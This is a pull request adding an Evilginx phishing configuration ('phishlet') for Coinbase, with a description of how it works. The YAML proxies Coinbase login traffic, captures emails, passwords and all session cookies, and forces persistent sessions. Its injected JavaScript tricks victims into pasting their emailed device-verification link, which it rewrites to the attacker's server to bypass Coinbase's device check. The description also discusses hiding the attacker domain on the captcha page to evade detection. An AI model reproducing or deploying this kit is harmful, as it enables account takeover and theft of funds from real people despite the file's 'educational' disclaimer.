### PR TITLE
Added Coinbase Phishlet

### DIFF
--- a/phishlets/coinbase.yaml
+++ b/phishlets/coinbase.yaml
@@ -1,0 +1,160 @@
+# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
+# PLEASE DO NOT MISUSE THIS PHISHLET.
+
+# Don't Forget To set "domain" Params to your domain name (example.com)...
+#
+# Use This Command To set the domain params from the evilginx command line.
+# Where ID is lure id number, and EXAMPLE.COM is your domain name.
+# lures edit params ID domain=EXAMPLE.COM
+ 
+
+author: '@An0nud4y'
+min_ver: '2.3.0'
+proxy_hosts:
+  - {phish_sub: 'www', orig_sub: 'www', domain: 'coinbase.com', session: true, is_landing: true}
+  - {phish_sub: 'ws', orig_sub: 'ws', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
+  - {phish_sub: 'googletag', orig_sub: 'www', domain: 'googletagmanager.com', session: true, is_landing: false}
+  - {phish_sub: '', orig_sub: '', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'assets', orig_sub: 'assets', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'dynamic', orig_sub: 'dynamic-assets', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'ravenjs.com', session: true, is_landing: false}
+  - {phish_sub: 'sessions', orig_sub: 'sessions', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'events', orig_sub: 'events-service', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'exceptions', orig_sub: 'exceptions', domain: 'coinbase.com', session: true, is_landing: false}
+  - {phish_sub: 'images', orig_sub: 'images', domain: 'coinbase.com', session: true, is_landing: false}
+
+
+sub_filters:
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+
+auth_tokens:
+  - domain: 'www.coinbase.com'
+    keys: ['.*,regexp']
+auth_urls:
+  - '/dashboard'
+  - '/dashboard/.*'    
+credentials:
+  username:
+    key: 'email'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'password'
+    search: '(.*)'
+    type: 'post'
+
+force_post:
+  - path: '/sessions'
+    search:
+      - {key: 'email', search: '.*'}
+      - {key: 'password', search: '.*'}
+    force:
+      - {key: 'stay_signed_in', value: '1'}
+    type: 'post'
+  - path: '/signin_step_two'
+    search:
+      - {key: 'token', search: '.*'}
+      - {key: 'phone_number_id', search: '.*'}
+    force:
+      - {key: 'remember_computer', value: '1'}
+    type: 'post'
+
+login:
+  domain: 'www.coinbase.com'
+  path: '/signin'
+
+
+# "function lp()" will dynamically replace the contents in device authentication html page, and will create a new input box and button. Some other replacements are just to make page look better.
+# "function ValidateLink()" will replace the domain name 'coinbase.com' with the evilginx server domain name to verify the device from the IP of evilginx server, and will popup a new window with that modified auth link. 
+#  In that way we will be able to successfully authenticate the new device login.
+
+# "function hcaptcha()" will replace the domain name during the captcha validation to decrease the possibility of getting caught by the user.
+
+js_inject:
+  - trigger_domains: ["www.coinbase.com"]
+    trigger_paths: ["/device_confirmations/new"]
+    trigger_params: [domain]
+    script: |
+      function lp(){
+        var elem1 = document.getElementsByClassName("account-inner")[0];
+        elem1.parentNode.removeChild(elem1); 
+        var elem2 = document.getElementsByClassName("device-support")[0];
+        elem2.parentNode.removeChild(elem2);
+        var div = document.createElement('div');
+        div.className = 'account-inner';
+        div.innerHTML = `
+        <img class="account-icon" src="https://www.coinbase.com/assets/quickstart/icon-signup-9ed7432acbf85046d2a12f1e29f9e245d6e8376b379b524a1ebb6250c993f4d1.png">
+        <div class="account-icon"></div>
+        <h2 class="account-header">Authorize This Login</h2>
+        <p>Copy The Verification Link Received in Email And Paste It Below To Verify The Login </p>
+        <form action="">
+        <fieldset>
+        <input type="url" name="linkVerify" id="linkVerify" placeholder="https://coinbase.com/device_confirmations/confirm_email?token=xxxxxxxxxxxxxxxx" pattern="https://.*"> 
+        <input class="btn" type="button" value="Verify Device" onclick="ValidateLink()">
+        </fieldset></form>
+        <p></p>
+        `;
+        document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
+        var div = document.createElement('div');
+        div.className = 'device-support';
+        div.innerHTML = `
+        <p>Email didn't arrive?</p>
+        <p>Visit our <a href="https://support.coinbase.com/customer/portal/articles/2521789">Support Center</a>.</p>
+        <p></p>
+        <p>
+        <a href="/email_recovery/new">
+          I no longer have access to my email address
+        </a>      </p>
+        `;
+        document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
+        return;
+      }
+      function ValidateLink(){
+        var domain = "{domain}"
+        var link1 = document.getElementById("linkVerify").value;
+        var link2 = link1.replace('coinbase.com', domain);
+        console.log(link2)
+        window.open(link2, '_blank').focus();
+      }
+      setTimeout(function(){ lp(); }, 2500);
+
+
+# HCAPTCHA Header That shows domain name can be Replaced dynamically with javascripts, Its Disabled Here Because Its resulting in Hcaptcha error, Find your ways to solve it.
+#
+#  - trigger_domains: ["www.coinbase.com"]
+#    trigger_paths: ["/signin","/signin*"]
+#    trigger_params: []
+#    script: |
+#      function hcaptcha(){
+#        var elem = document.getElementsByClassName("cf-subheadline")[0];
+#        elem.parentNode.removeChild(elem);
+#        var div = document.createElement('div');
+#        div.className = 'cf-subheadline';
+#        div.innerHTML = `
+#        <h2 class="cf-subheadline"><span data-translate="complete_sec_check">Please complete the security check to get access to</span> Coinbase Website</h2>
+#        `;
+#        document.getElementsByClassName("cf-wrapper cf-header cf-error-overview")[0].appendChild(div);
+#        return;
+#        }    


### PR DESCRIPTION
## Bypassing Coinbase Device Authentication Process 
Coinbase Needs Authentication For Each New Device Login To Get into the Account.
The Verification Link Received in email address Can't make the Authentication Even After Opened from The same Browser.
Thats because the Evilginx Server Has Different IP from the user IP address.

To achieve the same we can replace the domain name of verification link to the evilginx server domain name, In that way the device authentication will be triggered by the evilginx server IP.

- This is achieved with some js functions to dynamically replace the device auth html contents and by asking users to copy/paste the verification link from email.
- And By clicking the newly injected button the verification link will be dynamically replaced and  a new window will popup with modified coinbase device auth url.
- In Order to make it work user Has to set a domain params as the evilginx server domain name.
   `lures edit params ID domain=EXAMPLE.COM`
   Here ID is lure id number & Example.com is evilginx server domain name.
- Coinbase Has Hcaptcha Enabled , So sometime the hcaptcha gets triggered But that can be solved by the user manually as original hcaptcha problem.
- Hcaptcha Page also Highlights The Evilginx Server Domain Name , which is different from coinbase domain name, This can sometime increase the possibilities of being detected by the user, In Order to modify that we can inject js to replaced the respective element to remove evilginx server domain link.
- Injecting js to hcaptcha page sometimes breaks the page, This should be solved somehow.

